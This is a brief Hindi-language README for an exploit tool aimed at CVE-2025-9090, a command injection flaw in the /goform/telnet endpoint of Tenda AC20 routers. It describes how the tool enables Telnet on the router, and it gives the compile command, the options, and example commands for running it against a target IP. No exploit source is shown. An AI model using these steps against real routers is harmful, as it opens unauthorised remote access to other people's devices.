
Tenda AC20 16.03.08.12 (/goform/telnet) में कमांड इंजेक्शन।
लेखक: Byte Reaper
यह एक्सप्लॉइट CVE-2025-9090 को लक्षित करता है, जो Tenda AC20 (v16.03.08.12) राउटर में एक कमांड इंजेक्शन भेद्यता है।
दोष एंडपॉइंट /goform/telnet में है, जिसे दूरस्थ रूप से ट्रिगर किया जा सकता है।
जब एक्सेस किया जाता है, तो यह डिवाइस पर Telnet सेवा शुरू करता है, दूरस्थ इंटरैक्शन के लिए पोर्ट 23/2323 खोलता है।
प्रोग्राम कमजोर एंडपॉइंट पर एक अनुरोध भेजता है, प्रतिक्रिया स्ट्रिंग "load telnetd success" की तलाश करता है, और फिर सफल शोषण की पुष्टि करने के लिए Telnet सेवा से कनेक्ट करने का प्रयास करता है।
gcc का उपयोग करके संकलित करें:
gcc exploit.c argparse.c -o CVE-2025-9090 -lcurl
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
-i, --ip लक्ष्य IP दर्ज करें
-c, --cookies फ़ाइल कुकीज़ दर्ज करें
-v, --verbose वर्बोज़ मोड
-f, --loop= अनुरोधों की संख्या
./CVE-2025-9090 -i <IP>
- verbose mode :
./CVE-2025-9090 -i <IP> -v
- number request :
./CVE-2025-9090 -i <IP> -v -f 5 (5 POST endpoint)
- cookies file :
./CVE-2025-9090 -i <IP> -v -f 5 -c [file name]
MIT